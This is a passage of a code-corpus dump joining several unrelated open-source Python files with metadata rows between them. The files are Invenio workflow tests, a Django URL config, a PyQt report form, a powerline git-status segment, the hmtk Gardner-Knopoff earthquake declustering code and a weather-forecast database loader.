# FIXME: loglevels are simply overwritten somewhere in Celery
# even if Celery is not being "used".
#
# This means loglevel.DEBUG is NOT working at the moment!
# debug_msg = "This is a debug message"
# obj_init.log.debug(debug_msg)
obj_init.save()
obj_test = BibWorkflowObjectLog.query.filter(
BibWorkflowObjectLog.id_object == obj_init.id).all()
messages_found = 0
for current_obj in obj_test:
if current_obj.message == info_msg and messages_found == 0:
messages_found += 1
elif current_obj.message == err_msg and messages_found == 1:
messages_found += 1
self.assertEqual(2, messages_found)
def test_workflow_for_running_object(self):
"""Test workflow with running object given and watch it fail."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start_by_oids
from invenio_workflows.errors import WorkflowObjectVersionError
obj_running = BibWorkflowObject()
obj_running.set_data(1234)
obj_running.save(version=ObjectVersion.RUNNING)
try:
start_by_oids(
'demo_workflow', [
obj_running.id], module_name="unit_tests")
except Exception as e:
self.assertTrue(isinstance(e, WorkflowObjectVersionError))
obj_running.delete(e.id_object)
obj_running.delete(obj_running)
obj_running = BibWorkflowObject()
obj_running.set_data(1234)
obj_running.save(version=ObjectVersion.RUNNING)
try:
start_by_oids(
'demo_workflow', [
obj_running.id], module_name="unit_tests")
except Exception as e:
self.assertTrue(isinstance(e, WorkflowObjectVersionError))
obj_running.delete(e.id_object)
obj_running.delete(obj_running)
obj_running = BibWorkflowObject()
obj_running.set_data(1234)
obj_running.save(version=5)
try:
start_by_oids('demo_workflow', [obj_running.id],
module_name="unit_tests")
except Exception as e:
self.assertTrue(isinstance(e, WorkflowObjectVersionError))
obj_running.delete(e.id_object)
obj_running.delete(obj_running)
def test_continue_execution_for_object(self):
"""Test continuing execution of workflow for object given."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, continue_oid
initial_data = 1
# testing restarting from previous task
init_workflow = start("demo_workflow",
data=[initial_data],
module_name="unit_tests")
obj_halted = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == init_workflow.uuid,
BibWorkflowObject.version == ObjectVersion.WAITING
).first()
self.assertTrue(obj_halted)
self.assertEqual(1, obj_halted.get_data())
# Try to restart, we should halt again actually.
continue_oid(oid=obj_halted.id, start_point="restart_task",
module_name="unit_tests")
self.assertEqual(1, obj_halted.get_data())
self.assertEqual(ObjectVersion.WAITING, obj_halted.version)
# We skip to next part, this should work
continue_oid(oid=obj_halted.id, module_name="unit_tests")
self.assertEqual(19, obj_halted.get_data())
self.assertEqual(ObjectVersion.COMPLETED, obj_halted.version)
# Let's do that last task again, shall we?
continue_oid(oid=obj_halted.id, start_point="restart_prev",
module_name="unit_tests")
self.assertEqual(37, obj_halted.get_data())
self.assertEqual(ObjectVersion.COMPLETED, obj_halted.version)
def test_restart_workflow(self):
"""Test restarting workflow for given workflow id."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import start, start_by_wid
initial_data = 1
init_workflow = start(workflow_name="demo_workflow",
data=[initial_data],
module_name="unit_tests")
init_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == init_workflow.uuid
).order_by(BibWorkflowObject.id).all()
self.assertEqual(2, len(init_objects))
restarted_workflow = start_by_wid(wid=init_workflow.uuid,
module_name="unit_tests")
# We expect the same workflow to be re-started
self.assertTrue(init_workflow.uuid == restarted_workflow.uuid)
restarted_objects = BibWorkflowObject.query.filter(
BibWorkflowObject.id_workflow == restarted_workflow.uuid
).order_by(BibWorkflowObject.id).all()
# This time we should only have one more initial object
self.assertEqual(2, len(restarted_objects))
# Last object will be INITIAL
self.assertEqual(ObjectVersion.INITIAL, restarted_objects[1].version)
self.assertEqual(restarted_objects[1].id_parent,
restarted_objects[0].id)
def test_restart_failed_workflow(self):
"""Test restarting workflow for given workflow id."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.engine import WorkflowStatus
from invenio_workflows.api import start, start_by_oids
from invenio_workflows.errors import WorkflowError
initial_data = BibWorkflowObject.create_object()
initial_data.set_data(1)
initial_data.save()
self.assertRaises(
WorkflowError,
start,
workflow_name="demo_workflow_error",
data=[initial_data],
module_name="unit_tests"
)
self.assertEqual(initial_data.version, ObjectVersion.ERROR)
restarted_workflow = start_by_oids("demo_workflow",
oids=[initial_data.id],
module_name="unit_tests")
self.assertEqual(initial_data.version, ObjectVersion.WAITING)
self.assertEqual(restarted_workflow.status, WorkflowStatus.HALTED)
def _check_workflow_execution(self, objects, initial_data):
"""Test correct workflow execution."""
from invenio_workflows.models import ObjectVersion
# Let's check that we found anything. There should only be one object
self.assertEqual(len(objects), 1)
parent_object = objects[0]
        # The parent object should be in the halted version
self.assertEqual(ObjectVersion.HALTED, parent_object.version)
        # The child object should have the initial data
self.assertEqual(initial_data, objects[0].child_objects[0].get_data())
# Fetch final object which should exist
final_object = objects[0].child_objects[0]
self.assertTrue(final_object)
class TestWorkflowTasks(WorkflowTasksTestCase):
"""Test meant for testing the the generic tasks available."""
def setUp(self):
"""Setup tests."""
self.create_registries()
def tearDown(self):
"""Clean up tests."""
from invenio_workflows.models import Workflow
self.delete_objects(
Workflow.get(Workflow.module_name == "unit_tests").all())
self.cleanup_registries()
def test_logic_tasks_restart(self):
"""Test that the logic tasks work correctly when restarted."""
from invenio_workflows.models import BibWorkflowObject
from invenio_workflows.api import (start,
start_by_wid)
test_object = BibWorkflowObject()
test_object.set_data(0)
test_object.save()
# Initial run
workflow = start('demo_workflow_logic', [test_object],
module_name="unit_tests")
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
# Reset before re-starting (reset Iterator data)
workflow.reset_extra_data()
workflow = start_by_wid(workflow.uuid)
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
def test_logic_tasks_continue(self):
"""Test that the logic tasks work correctly when continuing."""
from invenio_workflows.models import (BibWorkflowObject,
ObjectVersion)
from invenio_workflows.api import (start,
continue_oid)
from invenio_workflows.engine import WorkflowStatus
test_object = BibWorkflowObject()
test_object.set_data(0)
test_object.save()
workflow = start('demo_workflow_logic', [test_object],
module_name="unit_tests")
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(6, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(9, test_object.get_data())
self.assertEqual("gte9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(15, test_object.get_data())
self.assertEqual("gte9", test_object.get_extra_data()["test"])
workflow = continue_oid(test_object.id)
self.assertEqual(ObjectVersion.COMPLETED, test_object.version)
self.assertEqual(WorkflowStatus.COMPLETED, workflow.status)
def test_workflow_without_workflow_object_saved(self):
"""Test that the logic tasks work correctly."""
from invenio_workflows.models import BibWorkflowObject
from invenio_workflows.api import start, start_by_wid
test_object = BibWorkflowObject()
test_object.set_data(0)
test_object.save()
workflow = start(
'demo_workflow_logic',
[test_object],
module_name="unit_tests")
self.assertEqual(5, test_object.get_data())
self.assertEqual("lt9", test_object.get_extra_data()["test"])
start_by_wid(workflow.uuid)
test_object.delete(test_object.id)
def test_workflow_task_results(self):
"""Test the setting and getting of task results."""
from invenio_workflows.models import BibWorkflowObject
test_object = BibWorkflowObject()
test_object.save() # Saving is needed to instantiate default values
test_object.add_task_result("test", {"data": "testing"})
results = test_object.get_tasks_results()
self.assertEqual(len(results.get("test")), 1)
result_item = results.get("test")[0]
self.assertEqual({"data": "testing"},
result_item.get("result"))
self.assertEqual("workflows/results/default.html",
result_item.get("template"))
self.assertEqual("test",
result_item.get("name"))
| gpl-2.0 | 8,674,019,974,697,286,000 | 40.325428 | 381 | 0.62826 | false |
IQSS/gentb-site | apps/predict/urls.py | 2 | 2054 | #
# Copyright (C) 2017 Maha Farhat
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# pylint: disable=invalid-name
"""
Predict app's urls
"""
from django.urls import path
from django.conf.urls import include, url
from .views import (
Datasets, UploadChoices, UploadView, DatasetView, AddNote, ScatterPlot,
DatasetViewProcessing, DatasetViewOutput, DatasetViewPredict, DatasetViewLineages
)
def url_tree(regex, *urls):
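    # Django's include() reads the ``urlpatterns`` attribute off whatever object it
    # is given, so this throwaway class nests the supplied urls under ``regex``.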
class UrlTwig(object):
urlpatterns = urls
return url(regex, include(UrlTwig))
app_name = 'predict'
urlpatterns = [
path('', Datasets.as_view(), name="view_my_datasets"),
url_tree(
r'^upload/',
url(r'^$', UploadChoices.as_view(), name="upload"),
url(r'^(?P<type>[\w-]+)/$', UploadView.as_view(), name="upload"),
),
url_tree(
r'^(?P<slug>\w{32})/',
url(r'^$', DatasetView.as_view(), name="view_single_dataset"),
url_tree(
r'^page/',
url(r'^process/$', DatasetViewProcessing.as_view(), name="dataset_proc"),
url(r'^output/$', DatasetViewOutput.as_view(), name="dataset_out"),
url(r'^predict/$', DatasetViewPredict.as_view(), name="dataset_pred"),
url(r'^lineages/$', DatasetViewLineages.as_view(), name="dataset_lin"),
),
url(r'^note/$', AddNote.as_view(), name="add_note"),
),
url(r'^results/(?P<pk>\d+)/plot/', ScatterPlot.as_view(), name="scatter_plot"),
]
| agpl-3.0 | -3,061,693,881,197,445,600 | 35.678571 | 85 | 0.655794 | false |
InUrSys/PescArt2.0 | src/Reports/Relatorio_SaidasPorProvinica.py | 1 | 1633 | '''
Created on 01/02/2018
@author: chernomirdinmacuvele
'''
import ReportAPI
from ui_Relatorio_SaidasPorProvincia import Ui_Form
import FuncSQL
from PyQt5.Qt import QPlainTextEdit, QComboBox
class Relatorio_SaidasPorProvincia(ReportAPI.JasperReports, Ui_Form):
def __init__(self, parent=None, dbcon=None):
super(Relatorio_SaidasPorProvincia, self).__init__(parent)
self.setupUi(self)
self.dbcon = dbcon
self.relatorio = 'Saidas_Distrito'
self.setForm()
def setForm(self):
self.LEFormato.setText(self.getFormat())
self.getInfoReport()
self.setProvincias()
self.PBGerar.clicked.connect(self.generateReport)
def getInfoReport(self):
quer = "SELECT nome, descricao FROM public.prc_relatorios where nome = '{nome}'".format(nome = self.relatorio)
bok, valOut = FuncSQL.anySelectScript(scpt= quer)
if bok:
self.LENome.setText(str(valOut[0]))
self.PTEDescricao.setPlainText(str(valOut[1]))
def setProvincias(self):
quer = "select distinct provincia from view_saidas_provincias"
lstOut = []
bok, valOut = FuncSQL.multLineSelect(scpt=quer)
if bok:
for val in valOut:
lstOut.append(val[0])
self.CBProvincia.addItems(lstOut)
def generateReport(self):
file = self.LENome.text()
formato = self.LEFormato.text().lower()
provincia = [self.CBProvincia.currentText()]
self.getTemplateFile(file=file, format=formato, parametro=provincia) | gpl-3.0 | 6,905,557,344,856,947,000 | 31.68 | 118 | 0.63319 | false |
adamk33n3r/powerline-gitstatus | powerline_gitstatus/segments.py | 1 | 6654 | # vim:fileencoding=utf-8:noet
from powerline.segments import Segment, with_docstring
from powerline.theme import requires_segment_info
from subprocess import PIPE, Popen
import os, re, string
@requires_segment_info
class GitStatusSegment(Segment):
def execute(self, pl, command):
pl.debug('Executing command: %s' % ' '.join(command))
proc = Popen(command, stdout=PIPE, stderr=PIPE)
out, err = [item.decode('utf-8') for item in proc.communicate()]
if out:
pl.debug('Command output: %s' % out.strip(string.whitespace))
if err:
pl.debug('Command errors: %s' % err.strip(string.whitespace))
return (out.splitlines(), err.splitlines())
def get_base_command(self, cwd, use_dash_c):
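        # Prefer `git -C <cwd>` when allowed; otherwise walk up from cwd looking for
        # a .git directory and fall back to explicit --git-dir/--work-tree arguments.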
if use_dash_c:
return ['git', '-C', cwd]
while cwd and cwd != os.sep:
gitdir = os.path.join(cwd, '.git')
if os.path.isdir(gitdir):
return ['git', '--git-dir=%s' % gitdir, '--work-tree=%s' % cwd]
cwd = os.path.dirname(cwd)
return None
def parse_branch(self, line):
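        # The line handled here is the '## ...' header emitted by
        # `git status --branch --porcelain`, e.g. '## master...origin/master [ahead 1]'.
        # The return value is a (branch, detached, behind, ahead) tuple.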
if not line:
return ('', False, 0, 0)
if line.startswith('## '):
line = line[3:]
match = re.search('^Initial commit on (.+)$', line)
if match is not None:
return (match.group(1), False, 0, 0)
match = re.search('^(.+) \(no branch\)$', line)
if match is not None:
return (match.group(1), True, 0, 0)
match = re.search('^(.+?)\.\.\.', line)
if match is not None:
branch = match.group(1)
match = re.search('\[ahead (\d+), behind (\d+)\]$', line)
if match is not None:
return (branch, False, int(match.group(2)), int(match.group(1)))
match = re.search('\[ahead (\d+)\]$', line)
if match is not None:
return (branch, False, 0, int(match.group(1)))
match = re.search('\[behind (\d+)\]$', line)
if match is not None:
return (branch, False, int(match.group(1)), 0)
return (branch, False, 0, 0)
return (line, False, 0, 0)
def parse_status(self, lines):
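        # Each remaining porcelain line starts with a two-letter 'XY' code: X is the
        # index (staged) state, Y the work-tree state; '??' marks untracked files and
        # 'U'/'AA'/'DD' combinations mark unmerged (conflicted) paths.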
staged = len([True for l in lines if l[0] in 'MRC' or (l[0] == 'D' and l[1] != 'D') or (l[0] == 'A' and l[1] != 'A')])
unmerged = len([True for l in lines if l[0] == 'U' or l[1] == 'U' or (l[0] == 'A' and l[1] == 'A') or (l[0] == 'D' and l[1] == 'D')])
changed = len([True for l in lines if l[1] == 'M' or (l[1] == 'D' and l[0] != 'D')])
untracked = len([True for l in lines if l[0] == '?'])
return (staged, unmerged, changed, untracked)
def build_segments(self, branch, detached, behind, ahead, staged, unmerged, changed, untracked, stashed):
if detached:
branch_group = 'gitstatus_branch_detached'
elif staged or unmerged or changed or untracked:
branch_group = 'gitstatus_branch_dirty'
else:
branch_group = 'gitstatus_branch_clean'
segments = [
{'contents': u'\ue0a0 %s' % branch, 'highlight_groups': [branch_group, 'gitstatus_branch', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'}
]
if behind:
segments.append({'contents': ' ↓ %d' % behind, 'highlight_groups': ['gitstatus_behind', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if ahead:
segments.append({'contents': ' ↑ %d' % ahead, 'highlight_groups': ['gitstatus_ahead', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if staged:
segments.append({'contents': ' ● %d' % staged, 'highlight_groups': ['gitstatus_staged', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if unmerged:
segments.append({'contents': ' ✖ %d' % unmerged, 'highlight_groups': ['gitstatus_unmerged', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if changed:
segments.append({'contents': ' ✚ %d' % changed, 'highlight_groups': ['gitstatus_changed', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if untracked:
segments.append({'contents': ' … %d' % untracked, 'highlight_groups': ['gitstatus_untracked', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
if stashed:
segments.append({'contents': ' ⚑ %d' % stashed, 'highlight_groups': ['gitstatus_stashed', 'gitstatus'], 'divider_highlight_group': 'gitstatus:divider'})
return segments
def __call__(self, pl, segment_info, use_dash_c=True):
pl.debug('Running gitstatus %s -C' % ('with' if use_dash_c else 'without'))
cwd = segment_info['getcwd']()
if not cwd:
return
base = self.get_base_command(cwd, use_dash_c)
if not base:
return
status, err = self.execute(pl, base + ['status', '--branch', '--porcelain'])
if err and ('error' in err[0] or 'fatal' in err[0]):
return
branch, detached, behind, ahead = self.parse_branch(status.pop(0))
if not branch:
return
if branch == 'HEAD':
branch = self.execute(pl, base + ['rev-parse', '--short', 'HEAD'])[0][0]
staged, unmerged, changed, untracked = self.parse_status(status)
stashed = len(self.execute(pl, base + ['stash', 'list', '--no-decorate'])[0])
return self.build_segments(branch, detached, behind, ahead, staged, unmerged, changed, untracked, stashed)
gitstatus = with_docstring(GitStatusSegment(),
'''Return the status of a Git working copy.
It will show the branch-name, or the commit hash if in detached head state.
It will also show the number of commits behind, commits ahead, staged files,
unmerged files (conflicts), changed files, untracked files and stashed files
if that number is greater than zero.
:param bool use_dash_c:
Call git with ``-C``, which is more performant and accurate, but requires git 1.8.5 or higher.
Otherwise it will traverse the current working directory up towards the root until it finds a ``.git`` directory, then use ``--git-dir`` and ``--work-tree``.
True by default.
Divider highlight group used: ``gitstatus:divider``.
Highlight groups used: ``gitstatus_branch_detached``, ``gitstatus_branch_dirty``, ``gitstatus_branch_clean``, ``gitstatus_branch``, ``gitstatus_behind``, ``gitstatus_ahead``, ``gitstatus_staged``, ``gitstatus_unmerged``, ``gitstatus_changed``, ``gitstatus_untracked``, ``gitstatus_stashed``, ``gitstatus``.
''')
| mit | -7,563,015,586,799,896,000 | 40.761006 | 306 | 0.587801 | false |
manueldl/retrosmart-openbox-themes | src/mkobt.py | 1 | 8268 | #!/usr/bin/env python3
# mkobt --light white --dark black --active blue --inactive darkgrey
# --box grey --notify yellow --menu orange -w red
import configparser
import os
import argparse
def get_config(configfile):
    ''' Get config from the config file. Overridden by command line options. '''
# FIXME: Need to validate config
config = configparser.ConfigParser()
# Hardcoding default config:
config['DEFAULT'] = {
'light':'#ffffff',
'dark':'#000000',
'active':'#0000ff',
'menu':'#0000ff',
'inactive':'#666666',
'shadow':'#999999',
'box':'#cccccc',
'notify':'#ffcc00',
'warning':'#990000'
}
    # Read config from the config file; this works even if the file does not exist:
config.read(configfile)
return(config)
def automatic(hexstring):
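    # Choose a readable foreground colour for the given background: the expression
    # below is the BT.601 luma approximation (0.299*R + 0.587*G + 0.114*B); bright
    # backgrounds get 'black' text, dark ones get 'white'.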
if hexstring.startswith('#'):
hexstring = hexstring[1:]
r, g, b = tuple(bytes.fromhex(hexstring))
if (r * 0.299 + g * 0.587 + b * 0.114) > 140: # 186 # 140
color = 'black'
else:
color = 'white'
return(color)
def write_rc(theme, directory):
rc = {}
number = '0'
rc['window.client.padding.height'] = number
border = theme['border']
rc['border.width'] = border
rc['menu.separator.width'] = border
number = '5'
rc['menu.overlap'] = number
rc['padding.height'] = number
number = '7'
rc['padding.width'] = number
rc['window.client.padding.width'] = number
rc['window.handle.width'] = number
justify = 'left'
rc['menu.items.justify'] = justify
rc['menu.title.text.justify'] = justify
rc['window.label.text.justify'] = justify
texture = 'flat solid'
rc['window.inactive.label.bg'] = texture
rc['menu.items.active.bg'] = texture
rc['menu.items.bg'] = texture
rc['menu.title.bg'] = texture
rc['osd.bg'] = texture
rc['osd.hilight.bg'] = texture
rc['osd.label.bg'] = texture
rc['osd.unhilight.bg'] = texture
rc['window.active.grip.bg'] = texture
rc['window.active.handle.bg'] = texture
rc['window.active.label.bg'] = texture
rc['window.active.title.bg'] = texture
rc['window.inactive.grip.bg'] = texture
rc['window.inactive.handle.bg'] = texture
rc['window.inactive.title.bg'] = texture
texture = 'flat solid border'
rc['osd.button.focused.bg'] = texture
rc['osd.button.pressed.bg'] = texture
rc['osd.button.unpressed.bg'] = texture
rc['window.active.button.toggled.bg'] = texture
rc['window.inactive.button.toggled.bg'] = texture
rc['window.active.button.disabled.bg'] = texture
rc['window.inactive.button.disabled.bg'] = texture
rc['window.active.button.pressed.bg'] = texture
rc['window.inactive.button.pressed.bg'] = texture
rc['window.active.button.unpressed.bg'] = texture
rc['window.inactive.button.unpressed.bg'] = texture
rc['window.active.button.hover.bg'] = texture
rc['window.inactive.button.hover.bg'] = texture
color = theme['light']
rc['osd.button.pressed.box.color'] = color
rc['window.active.button.disabled.bg.border.color'] = color
rc['window.active.button.disabled.image.color'] = color
rc['window.inactive.button.disabled.bg.border.color'] = color
rc['window.inactive.button.disabled.image.color'] = color
color = theme['dark']
rc['border.color'] = color
rc['osd.button.focused.box.color'] = color
rc['window.active.button.toggled.bg.border.color'] = color
rc['window.active.button.toggled.image.color'] = color
rc['window.inactive.button.toggled.bg.border.color'] = color
rc['window.inactive.button.toggled.image.color'] = color
rc['window.active.button.hover.image.color'] = color
rc['window.active.button.pressed.image.color'] = color
rc['window.active.button.unpressed.image.color'] = color
rc['window.inactive.button.hover.image.color'] = color
rc['window.inactive.button.unpressed.image.color'] = color
color = theme['active']
rc['osd.hilight.bg.color'] = color
rc['window.active.client.color'] = color
rc['window.active.grip.bg.color'] = color
rc['window.active.handle.bg.color'] = color
rc['window.active.label.bg.color'] = color
rc['window.active.title.bg.color'] = color
rc['window.active.title.separator.color'] = color
rc['window.inactive.button.pressed.bg.color'] = color
rc['window.active.label.text.color'] = automatic(color)
color = theme['inactive']
rc['menu.title.bg.color'] = color
rc['window.inactive.client.color'] = color
rc['window.inactive.grip.bg.color'] = color
rc['window.inactive.handle.bg.color'] = color
rc['window.inactive.label.bg.color'] = color
rc['window.inactive.title.bg.color'] = color
rc['window.inactive.title.separator.color'] = color
rc['menu.items.disabled.text.color'] = color
rc['menu.title.text.color'] = automatic(color)
color = theme['shadow']
rc['osd.button.focused.bg.color'] = color
rc['osd.button.focused.text.color'] = automatic(color)
rc['window.active.button.hover.bg.color'] = color
rc['window.active.button.pressed.bg.color'] = color
rc['window.inactive.button.hover.bg.color'] = color
color = theme['box']
rc['osd.bg.color'] = color
rc['osd.button.unpressed.bg.color'] = color
rc['osd.label.bg.color'] = color
rc['menu.items.bg.color'] = color
rc['osd.unhilight.bg.color'] = color
rc['window.inactive.label.text.color'] = color
rc['menu.items.text.color'] = automatic(color)
rc['osd.button.unpressed.text.color'] = automatic(color)
rc['osd.label.text.color'] = automatic(color)
rc['window.active.button.unpressed.bg.color'] = color
rc['window.inactive.button.unpressed.bg.color'] = color
color = theme['warning']
rc['window.active.button.disabled.bg.color'] = color
rc['window.inactive.button.disabled.bg.color'] = color
color = theme['notify']
rc['window.active.button.toggled.bg.color'] = color
rc['window.inactive.button.toggled.bg.color'] = color
color = theme['menu'] or theme['active']
rc['menu.items.active.bg.color'] = color
rc['osd.button.pressed.bg.color'] = color
rc['menu.items.active.text.color'] = automatic(color)
rc['osd.button.pressed.text.color'] = automatic(color)
themerc = os.path.join(directory, 'themerc')
with open(themerc, 'w') as t:
for k in rc:
print(k + ': ' + rc[k], file=t)
t.close()
def install_icons(orig, dest):
os.makedirs(dest)
for i in os.listdir(orig):
o = os.path.join(orig, i)
d = os.path.join(dest, i)
with open(o, 'r') as src, open(d, 'w') as dst:
for j in open(os.path.join(orig, i), 'r'):
print(j, end='', file=dst)
src.close()
dst.close()
def parseargs():
''' Parse arguments from command line. '''
# Default options:
config = 'theme.ini' # Configuration file
theme = 'DEFAULT'
name = 'retrosmart-openbox'
icons = 'pixmaps'
ALL = False
parser = argparse.ArgumentParser(
prog='mkobt',
description='Makes Openbox themes'
)
parser.add_argument('-c', '--config', default=config)
parser.add_argument('-n', '--name', default=name)
parser.add_argument('-t', '--theme', default=theme)
parser.add_argument('-i', '--icons', default=icons)
parser.add_argument('-a', '--all', default=ALL, action='store_true')
return(parser.parse_args())
def main():
theme = {}
settings = parseargs()
config = get_config(settings.config)
if settings.all:
for i in config.sections():
for j in config[i]:
theme[j] = config[i][j]
directory = os.path.join(settings.name + '-' + i, 'openbox-3')
install_icons(settings.icons, directory)
write_rc(theme, directory)
else:
for i in config[settings.theme]:
theme[i] = config[settings.theme][i]
directory = os.path.join(settings.name + '-' + settings.theme, 'openbox-3')
install_icons(settings.icons, directory)
write_rc(theme, directory)
if __name__ == '__main__':
main()
| gpl-3.0 | -32,108,374,974,227,184 | 32.204819 | 83 | 0.623609 | false |
gem/oq-engine | openquake/hmtk/seismicity/declusterer/dec_gardner_knopoff.py | 1 | 6271 | # -*- coding: utf-8 -*-
# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# LICENSE
#
# Copyright (C) 2010-2021 GEM Foundation, G. Weatherill, M. Pagani,
# D. Monelli.
#
# The Hazard Modeller's Toolkit is free software: you can redistribute
# it and/or modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either version
# 3 of the License, or (at your option) any later version.
#
# You should have received a copy of the GNU Affero General Public License
# along with OpenQuake. If not, see <http://www.gnu.org/licenses/>
#
# DISCLAIMER
#
# The software Hazard Modeller's Toolkit (openquake.hmtk) provided herein
# is released as a prototype implementation on behalf of
# scientists and engineers working within the GEM Foundation (Global
# Earthquake Model).
#
# It is distributed for the purpose of open collaboration and in the
# hope that it will be useful to the scientific, engineering, disaster
# risk and software design communities.
#
# The software is NOT distributed as part of GEM’s OpenQuake suite
# (https://www.globalquakemodel.org/tools-products) and must be considered as a
# separate entity. The software provided herein is designed and implemented
# by scientific staff. It is not developed to the design standards, nor
# subject to same level of critical review by professional software
# developers, as GEM’s OpenQuake software suite.
#
# Feedback and contribution to the software is welcome, and can be
# directed to the hazard scientific staff of the GEM Model Facility
# (hazard@globalquakemodel.org).
#
# The Hazard Modeller's Toolkit (openquake.hmtk) is therefore distributed
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# for more details.
#
# The GEM Foundation, and the authors of the software, assume no
# liability for use of the software.
"""
Module :mod:`openquake.hmtk.seismicity.declusterer.dec_gardner_knopoff`
defines the Gardner and Knopoff declustering algorithm
"""
import numpy as np
from openquake.hmtk.seismicity.declusterer.base import (
BaseCatalogueDecluster, DECLUSTERER_METHODS)
from openquake.hmtk.seismicity.utils import decimal_year, haversine
from openquake.hmtk.seismicity.declusterer.distance_time_windows import (
TIME_DISTANCE_WINDOW_FUNCTIONS)
@DECLUSTERER_METHODS.add(
"decluster",
time_distance_window=TIME_DISTANCE_WINDOW_FUNCTIONS,
fs_time_prop=np.float)
class GardnerKnopoffType1(BaseCatalogueDecluster):
"""
This class implements the Gardner Knopoff algorithm as described in
this paper:
    Gardner, J. K. and Knopoff, L. (1974). Is the sequence of earthquakes
    in Southern California, with aftershocks removed, Poissonian? Bull.
Seism. Soc. Am., 64(5): 1363-1367.
"""
def decluster(self, catalogue, config):
"""
The configuration of this declustering algorithm requires two
objects:
- A time-distance window object (key is 'time_distance_window')
- A value in the interval [0,1] expressing the fraction of the
time window used for aftershocks (key is 'fs_time_prop')
:param catalogue:
Catalogue of earthquakes
:type catalogue: Dictionary
:param config:
Configuration parameters
:type config: Dictionary
:returns:
**vcl vector** indicating cluster number,
**flagvector** indicating which eq events belong to a cluster
:rtype: numpy.ndarray
"""
# Get relevant parameters
neq = len(catalogue.data['magnitude']) # Number of earthquakes
# Get decimal year (needed for time windows)
year_dec = decimal_year(
catalogue.data['year'], catalogue.data['month'],
catalogue.data['day'])
# Get space and time windows corresponding to each event
# Initial Position Identifier
sw_space, sw_time = (
config['time_distance_window'].calc(
catalogue.data['magnitude'], config.get('time_cutoff')))
eqid = np.arange(0, neq, 1)
# Pre-allocate cluster index vectors
vcl = np.zeros(neq, dtype=int)
# Sort magnitudes into descending order
id0 = np.flipud(np.argsort(catalogue.data['magnitude'],
kind='heapsort'))
longitude = catalogue.data['longitude'][id0]
latitude = catalogue.data['latitude'][id0]
sw_space = sw_space[id0]
sw_time = sw_time[id0]
year_dec = year_dec[id0]
eqid = eqid[id0]
flagvector = np.zeros(neq, dtype=int)
# Begin cluster identification
clust_index = 0
for i in range(0, neq - 1):
if vcl[i] == 0:
# Find Events inside both fore- and aftershock time windows
dt = year_dec - year_dec[i]
vsel = np.logical_and(
vcl == 0,
np.logical_and(
dt >= (-sw_time[i] * config['fs_time_prop']),
dt <= sw_time[i]))
# Of those events inside time window,
# find those inside distance window
vsel1 = haversine(longitude[vsel],
latitude[vsel],
longitude[i],
latitude[i]) <= sw_space[i]
vsel[vsel] = vsel1[:, 0]
temp_vsel = np.copy(vsel)
temp_vsel[i] = False
if any(temp_vsel):
# Allocate a cluster number
vcl[vsel] = clust_index + 1
flagvector[vsel] = 1
# For those events in the cluster before the main event,
# flagvector is equal to -1
temp_vsel[dt >= 0.0] = False
flagvector[temp_vsel] = -1
flagvector[i] = 0
clust_index += 1
# Re-sort the catalog_matrix into original order
id1 = np.argsort(eqid, kind='heapsort')
eqid = eqid[id1]
vcl = vcl[id1]
flagvector = flagvector[id1]
return vcl, flagvector
| agpl-3.0 | -5,080,174,637,922,129,000 | 39.173077 | 79 | 0.629807 | false |
enanablancaynumeros/OpenWeatherForecast | open_weather_forecast/info_extractor/forecast/get_forecast.py | 1 | 1571 | from datetime import datetime
from open_weather_forecast.info_extractor.get_info import GetInfo
from open_weather_forecast.info_extractor.forecast.forecast_weather_info import Base, ForecastWeather, Temperature
from open_weather_forecast.conf.constants import WEATHER_DATE_FORMAT
class GetForecast(GetInfo):
def __init__(self):
super(GetForecast).__init__()
self.engine = None
self.password = None
self.username = None
self.host = None
self.db_name = None
self.db_url = None
self.base = Base
self.session = None
def store_data(self, data):
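        # For every forecast point in the payload's "list", create a Temperature row
        # from its "main" block and a ForecastWeather row keyed by its dt_txt
        # timestamp, skipping points that are already stored.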
self.get_db_connection()
self.get_db_session()
for point in data.get("list"):
existing_weather = self.session.query(ForecastWeather).filter_by(dt_txt=point.get("dt_txt")).first()
if not existing_weather:
# Create
new_temperature = Temperature(**point.get("main"))
self.session.add(new_temperature)
weather_pk = datetime.strptime(point.get("dt_txt"), WEATHER_DATE_FORMAT)
new_weather_point = ForecastWeather(dt_txt=weather_pk, temperature=new_temperature)
self.session.add(new_weather_point)
self.session.commit()
def load_data(self):
self.get_db_connection()
self.get_db_session()
res = {list(x.serialize.keys())[0]: x.serialize.get(list(x.serialize.keys())[0]) for x in self.session.query(ForecastWeather).all()}
self.session.close()
return res
